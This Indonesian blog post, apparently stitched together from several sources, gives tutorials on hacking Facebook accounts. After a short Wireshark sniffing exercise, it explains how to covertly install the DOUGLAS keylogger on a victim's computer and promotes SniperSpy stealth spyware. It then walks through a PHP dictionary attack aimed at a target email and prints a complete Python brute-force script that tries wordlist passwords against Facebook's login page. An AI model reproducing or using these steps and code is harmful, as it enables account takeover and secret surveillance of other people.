memantau serangan dari port scanning yang dilakukan dengan menggunakan program nmap.
Untuk yang (1) yang disebut satu sesi adalah login, membaca sebuah email (atau menulis sebuah email), kemudian logout. Jangan lupa program sniffer diset agar semua data ditangkap. Biasanya default dari program sniffer hanya menangkap header saja. Tujuan utamanya adalah untuk menghitung jumlah data yang ditangkap.
Untuk (2) tujuannya adalah untuk melihat pola “serangan” port scanning yang dilakukan oleh nmap. Apakah dia melakukan scanning dengan menguji port secara berurutan?
langsung saja menuju langkah-langkah yang dilakukan untuk melakukan sniffing paket data ini:
pertama-tama buka aplikasi wireshark
kedua, pilih menu Capture kemudian submenu Interfaces, atau bisa juga dengan jalan pintas menekan tombol Ctrl+I
pilih interface yang ingin anda sadap paket datanya, disarankan koneksi yang dipilih adalah koneksi yang menggunakan kabel bukan koneksi yang nirkabel maupun koneksi dengan modem USB atau sejenisnya. Pilih menu Option pada interface yang ingin Anda sadap paket datanya.
pada bagian “Capture filter” masukkan sebagai berikut(ganti alamat.ip.komputer.anda dengan alamat IP komputer yang digunakan untuk melakukan penyadapan paket data)
host www.facebook.com and host alamat.ip.komputer.anda
Klik start, maka proses penyadapan akan segera dimulai
Jika ingin menyudahi proses penyadapan, klik tombol stop atau dengan menekan jalan pintas Ctrl+e
Untuk mengetahui statistik paket yang berhasil disadap, cukup dengan memilih menu Statistic kemudian submenu Summary, maka akan tampil hasil seperti contoh berikut:
hasil statistik sniffing paket data facebook
Pada data yang saya sadap dengan menggunakan wireshark ini paket data dari facebook cukup kecil (56948 bytes) hal ini mungkin dikarenakan metoda caching yang ada pada browser yang saya gunakan untuk membuka facebook masih menyimpan data-data yang diperlukan sehingga data cukup kecil.
sekian postingan kali ini.
CARA HACK FACEBOOK DENGAN KEYLOGGER
PERTAMA:
Kembali lagi bagi anda yang menggunakan akses internet dari warnet atau hotspot dan mungkin juga di kampus atau di kantor harap berhati-hati. cara hack facebook dengan metode ini juga cukup mudah, tinggal pasang software keylogger yang berfungsi untuk merekam aktifitas penggunaan keyboard dan kemudian menggunakan data tersebut untuk mendapatkan username dan password facebook. seseorang bisa saja memasang software keylogger ke laptop atau pc anda atau menyebar trojan kedalam komputer di dalam sebuah jaringan komputer yang tidak aman. cara mencegahnya : pastikan antivirus pada komputer anda selalu up to date.
KEDUA:
Hai facebook’er! Tutorial facebook kali ini akan menjelaskan cara hack facebook dengan keylogger. Cara’nya gimana? Keylogger itu apa? Keylogger merupakan software yang berfungsi untuk memonitoring kegiatan PC dengan me’record / merekam kegiatan keyboard. Berikut akan dijelasin cara penggunaan’nya. AMPUH! Mau ?
Bagi facebook’er yang belum mempunyai keylogger, bisa download secara gratis disini. Sebenarnya software keylogger itu macam-macam namanya. Yang krisna gunakan yaitu keylogger yang bernama DOUGLAS 1.1.
Sebelum beraksi, pastikan dulu korbannya siapa. apakah PC rumah, PC Temen, PC warnet, PC kantor, atau mungkin PC Pacar/Istri … hahahaha
Kalau sudah pasti, sekarang krisna jelasin dah cara penggunaan’nya.
1. Setelah di download, jangan lupa extract file tersebut. OK ! Setelah file download tersebut di extract, akan ada 2 folder : Folder DOUGLAS_EN dan Folder DOUGLAS_ES .
2. Hapus aja Folder DOUGLAS_ES, gag penting !!! tanya kenapa ? karena pake bahasa spanyol … hehehe, yang kita gunakan yaitu Folder DOUGLAS_EN, karena menggunakan bahasa Inggris. hihihi …
3. Langkah selanjutnya yaitu buka folder DOUGLAS_EN. Di dalam pasti ada 6 File dan 1 Folder DATA. iya to ?? hohoho
4. Double klik pada file install.exe . Nanti pada proses penginstalan, anda akan diminta memasukan password. Isilah password tersebut, terserah tapi yang mudah di ingat !!
5. Kalau proses penginstalan sudah selesai, terus ???
Nah, santai !!! mendingan sekarang anda bikin kopi + beli mendoan terlebih dahulu. Untuk selanjutnya mudah kok ! hahahaha
Habiz buat kopi + beli mendoan, kita ngapain ??? tidur aja … hahaha
Pastikan keylogger sudah terinstal, untuk menggunakan keylogger tinggal tekan tombol CTRL+ALT+SHIFT+F9 pada keyboard anda …
Untuk melihat informasi yang sudah di rekam oleh keylogger, anda pilih READ INFORMATION. Terus masukkan password yang sama dengan password yang anda masukkan waktu proses penginstalan.
Nah, Selese dah !!! Mudah to ???
Terus kalau di dalamnya kosong / tidak ada informasi apa-apa, itu kenapa ?? Itu disebabkan karena tidak adanya aktifitas. Maksud aktifitas disini yaitu Penggunan PC tersebut.
Contoh : Misal anda sedang facebookan, coba anda logout dari Facebook anda. Pastikan keylogger telah terinstal Di PC tersebut, terus coba anda login kembali dengan memasukkan alamat email dan password facebook anda. Lalu buka keylogger anda dengan menekan tombol CTRL+ALT+SHIFT+F9 … Kemudian pilih READ INFORMATION, lalu masukkan password keylogger anda. Hasilnya apa ??? anda sendiri yang tahu..
Selamat mencoba
KETIGA:
SniperSpy adalah Password Hacking software Remote yang dikombinasikan dengan Remote Install dan Remote Viewing feature. Setelah diinstal pada PC remote, Anda hanya perlu login ke account SniperSpy. Anda secara pribadi dapat melihat aktivitas log dari PC remote! Ini berarti bahwa Anda dapat melihat log dari PC remote dari mana saja di dunia selama Anda memiliki akses internet.
Apakah Anda ingin Spy pada PC Remote? SniperSpy memungkinkan Anda untuk jarak jauh mata-mata setiap PC. Ini adalah satu-satunya perangkat lunak mata-mata remote PC dengan panel kontrol yang AMAN.
Remote PC software Spy juga menyimpan screenshot bersama dengan teks log chatting, website, penekanan tombol dalam bahasa dan banyak lagi. Remotely, melihat aktivitas anak Anda, karyawan atau siapapun menggunakan PC jauh dari Anda. Termasuk LIVE admin perintah dan kontrol.
Fitur SniperSpy :
1. Adalah perangkat lunak mata-mata SniperSpy deployable
2. Gaib Stealth Mode Option. Bekerja dalam mode siluman lengkap. Tidak terdeteksi
3. Log Semua keystrokes
4. Records setiap Password (Email, Login, Instant Messenger dll)
5. Remote Monitor Seluruh Percakapan IM sehingga Anda bisa memata-matai kegiatan IM
6. Menangkap format .jpg ukuran penuh gambar dari jendela aktif
7. Real Time Screen Viewer
8. Remote reboot atau shutdown PC atau memilih untuk logoff pengguna Windows saat ini
9. Lengkap, bypass Firewall apapun
CARA HACK FACEBOOK DENGAN METODE BRUTEFORCE
PERTAMA:
Cara hack facebook dengan metode ini adalah cara paling bodoh untuk membobol facebook dan biasanya paling terakhir digunakan, karena membutuhkan waktu yang tidak singkat. metode hacking facebook dengan cara ini adalah dengan menggunakan software bruteforce untuk menebak-nebak password facebook sebuah akun dari sebuah file dictionary / kamus atau juga character generator. cara mencegah hack facebook dengan metode ini adalah dengan melindungi alamat email yang anda gunakan untuk login facebook, caranya bisa bermacam-macam, anda bisa memisah antara email untuk umum dan email untuk login facebook dan tidak menampilkannya di halam profil facebook anda.
KEDUA:
Postingan tentang hacking facebook.
Facebook, ? iya sapa yg tidak kenal dengan situs jejaring sosial ini. Ga punya account tetapi setidaknya pernah dengar nama ini bukan ).
Jejaring Sosial ini mungkin salah satu fenomena di beberapa tahun belakangan ini setelah pendahulunya friendster. Nah sebagai situs pertemanan, situs jejaring sosial ini tidak luput dari ke isengan tangan2 jahil, motifnya pun beragam, mulai dari isengin pemiliknya, revenge, sakit hati, dan yg paling parah adalah karena dengan motif buat nyari CHIPS POKER (nah lo, ngaku aja lo pada )
Implementasi Facebook Hacking Dengan Brute Force
Berbagai teknik telah banyak beredar di kalangan underground, teknik nya pun beragam, mulai dari teknik phising (fake login ), maupun keylogger hanya dengan tujuan untuk mendapatkan account pribadi targetnya.
ok, cukup basa basinya rel…..to the point aja deh
sebelumnya kita musti bikin persiapan dolo, ibarat mo perang senjata harus lengkap ….
yg musti disiapin sebagai berikut
1. Musti punya server atau hosting (gratis/ bayar) buat upload and nyimpen script 2 berikut.
Facebook BruteForce Script
Simple Dictionary Attack
Nah, file itu adalah file utama yg harus disimpan ke dalam hostingan
2. Buat Dictionary Attack bisa qmu bikin tambah dan edit sendiri dari wordlist Dictionary ataw mungkin bisa cari yg lebih lengkap.
OK, persiapan telah selesai….saatnya ke medan perang……ga deng, maksudnya kita akan melakukan testing.
disini saya asumsikan lo pada udah punya hosting buat tempat naroh file-file tadi.
klo ga tau cara bikin hosting silahkan tanya ke google yah )
1.pada source code Facebook Dictionary attacknya kita edit dolo sebelom di upload
set_time_limit(0);
kita ubah time limitnya menjadi gede misalnya 500 dan ini dalam hitungan detik hingga code itu menjadi
set_time_limit(500);
2.
$username =”brute@force.org”;
// username korban misalnya target@bego.com hingga pada code menjadi
$username =”target@bego.com”;
3.
$dictionary =”dictionary.txt”;
adalah tempat dictionary attack kita. biasanya diletakkan dalam satu directory
Setelah Semuanya di Edit, upload ke Hostingan yg kamu punya, misalkan saya punya Hosting (orang) yg saya pakai untuk contoh ini saya upload ke dalam satu directory bernama fb.
Nah setelah kedua file tersebut sukses di upload dalam 1 direktory
setelah sukses, skr tinggal eksekusi tuh via eb address.
misalkan lo nyimpen di direktory /home/xxx.com/images/ maka eksekusi aja di http://xxx.com/images/
jika di eksekusi maka script akan mencoba membruteforce account milik target lo.
Jika dah selesai , maka log hasil bruteforce tadi akan tersimpan dengan nama cookie.txt. pada direktory yg sama . silahkan di analisa hasilnya….
And last word, thanks for you attention if u read a simple tutorial.
KETIGA:
Silakan download FbBruteforce:
Berikut Codenya:
#!/usr/bin/python
# This is facebook bruteforcer tools
# This was written for educational purpose and pentest only. Use it at your own risk.
# Author will not be responsible for any damage !!
# Toolname : facebookbruteforcer.py
# Programmer : Gunslinger_
# Version : 1.0
# Date : Tue Jul 27 13:24:44 WIT 2010
# Special thanks to mywisdom to inspire me ;)
import re
import os
import sys
import random
import warnings
import time
try:
import mechanize
except ImportError:
print "[*] Please install mechanize python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
import cookielib
except ImportError:
print "[*] Please install cookielib python module first"
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
warnings.filterwarnings(action="ignore", message=".*gzip transfer encoding is experimental!", category=UserWarning)
# define variable
_programmer_ = "gunslinger_ "
_version_ = "1.0"
verbose = False
useproxy = False
usepassproxy = False
log = 'fbbruteforcer.log'
file = open(log, "a")
success = 'http://www.facebook.com/?sk=messages&ref=mb'
fblogin = 'https://login.facebook.com/login.php?login_attempt=1'
# some cheating ..
ouruseragent = ['Mozilla/4.0 (compatible; MSIE 5.0; SunOS 5.10 sun4u; X11)',
'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.2.2pre) Gecko/20100207 Ubuntu/9.04 (jaunty) Namoroka/3.6.2pre',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; Avant Browser;',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT 5.0)',
'Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 5.1)',
'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.9.0.6)',
'Microsoft Internet Explorer/4.0b1 (Windows 95)',
'Opera/8.00 (Windows NT 5.1; U; en)',
'amaya/9.51 libwww/5.4.0',
'Mozilla/4.0 (compatible; MSIE 5.0; AOL 4.0; Windows 95; c_athome)',
'Mozilla/4.0 (compatible; MSIE 5.5; Windows NT)',
'Mozilla/5.0 (compatible; Konqueror/3.5; Linux) KHTML/3.5.5 (like Gecko) (Kubuntu)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; ZoomSpider.net bot; .NET CLR 1.1.4322)',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; QihooBot 1.0 qihoobot@qihoo.net)',
'Mozilla/4.0 (compatible; MSIE 5.0; Windows ME) Opera 5.11 [en]'
]
facebook = '''
__ _ _
/ _| | | | |
| |_ __ _ ___ __| |_ _ _ | | __
| _/ ` |/ __/ _ \ ' \ / _ \ / _ \| |/ /
| || (| | (_| __/ |) | () | () | <
|_| \_,_|\___\___|.__/ \___/ \___/|_|\_\\
bruteforcer...
Programmer : %s
Version : %s''' % (_programmer_, _version_)
option = '''
Usage : %s [options]
Option : -u, --username | User for bruteforcing
-w, --wordlist | Wordlist used for bruteforcing
-v, --verbose | Set %s will be verbose
-p, --proxy | Set http proxy will be use
-k, --usernameproxy | Set username at proxy will be use
-i, --passproxy | Set password at proxy will be use
-l, --log | Specify output filename (default : fbbruteforcer.log)
-h, --help | Print this help
Example : %s -u brad@hackme.com-w wordlist.txt"
P.S : add "&" to run in the background
''' % (sys.argv[0], sys.argv[0], sys.argv[0])
hme = '''
Usage : %s [option]
-h or --help for get help
''' % sys.argv[0]
def helpme():
print facebook
print option
file.write(facebook)
file.write(option)
sys.exit(1)
def helpmee():
print facebook
print hme
file.write(facebook)
file.write(hme)
sys.exit(1)
for arg in sys.argv:
try:
if arg.lower() == '-u' or arg.lower() == '--user':
username = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-w' or arg.lower() == '--wordlist':
wordlist = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-l' or arg.lower() == '--log':
log = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-p' or arg.lower() == '--proxy':
useproxy = True
proxy = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-k' or arg.lower() == '--userproxy':
usepassproxy = True
usw = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-i' or arg.lower() == '--passproxy':
usepassproxy = True
usp = sys.argv[int(sys.argv[1:].index(arg))+2]
elif arg.lower() == '-v' or arg.lower() == '--verbose':
verbose = True
elif arg.lower() == '-h' or arg.lower() == '--help':
helpme()
elif len(sys.argv) <= 1:
helpmee()
except IOError:
helpme()
except NameError:
helpme()
except IndexError:
helpme()
def bruteforce(word):
try:
sys.stdout.write("\r[*] Trying %s... " % word)
file.write("[*] Trying %s\n" % word)
sys.stdout.flush()
br.addheaders = [('User-agent', random.choice(ouruseragent))]
opensite = br.open(fblogin)
br.select_form(nr=0)
br.form['email'] = username
br.form['pass'] = word
br.submit()
response = br.response().read()
if verbose:
print response
if success in response:
print "\n\n[*] Logging in success..."
print "[*] Username : %s" % (username)
print "[*] Password : %s\n" % (word)
file.write("\n[*] Logging in success...")
file.write("\n[*] Username : %s" % (username))
file.write("\n[*] Password : %s\n\n" % (word))
sys.exit(1)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
except mechanize._mechanize.FormNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
except mechanize._form.ControlNotFoundError:
print "\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n"
file.write("\n[*] Facebook changing their system, please report bug at yudha.gunslinger@gmail.com\n")
sys.exit(1)
def releaser():
global word
for word in words:
bruteforce(word.replace("\n",""))
def main():
global br
global words
try:
br = mechanize.Browser()
cj = cookielib.LWPCookieJar()
br.set_cookiejar(cj)
br.set_handle_equiv(True)
br.set_handle_gzip(True)
br.set_handle_redirect(True)
br.set_handle_referer(True)
br.set_handle_robots(False)
br.set_debug_http(False)
br.set_debug_redirects(False)
br.set_debug_redirects(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
if useproxy:
br.set_proxies({"http": proxy})
if usepassproxy:
br.add_proxy_password(usw, usp)
if verbose:
br.set_debug_http(True)
br.set_debug_redirects(True)
br.set_debug_redirects(True)
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
preventstrokes = open(wordlist, "r")
words = preventstrokes.readlines()
count = 0
while count < len(words):
words[count] = words[count].strip()
count += 1
except IOError:
print "\n[*] Error: Check your wordlist path\n"
file.write("\n[*] Error: Check your wordlist path\n")
sys.exit(1)
except NameError:
helpme()
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
file.write("\n[*] Exiting program...\n")
sys.exit(1)
try:
print facebook
print "\n[*] Starting attack at %s" % time.strftime("%X")
print "[*] Account for bruteforcing %s" % (username)
print "[*] Loaded :",len(words),"words"
print "[*] Bruteforcing, please wait..."
file.write(facebook)
file.write("\n[*] Starting attack at %s" % time.strftime("%X"))
file.write("\n[*] Account for bruteforcing %s" % (username))
file.write("\n[*] Loaded : %d words" % int(len(words)))
file.write("\n[*] Bruteforcing, please wait...\n")
except KeyboardInterrupt:
print "\n[*] Exiting program...\n"
sys.exit(1)
try:
releaser()
bruteforce(word)
except NameError:
helpme()
if _name_ == '__main__':
main()
oke hanya itu saja, jangan di salah gunakan oke?????Salam manis:chinta lee :)
Subscribe to:
Post Comments (Atom)
0 komentar:
Post a Comment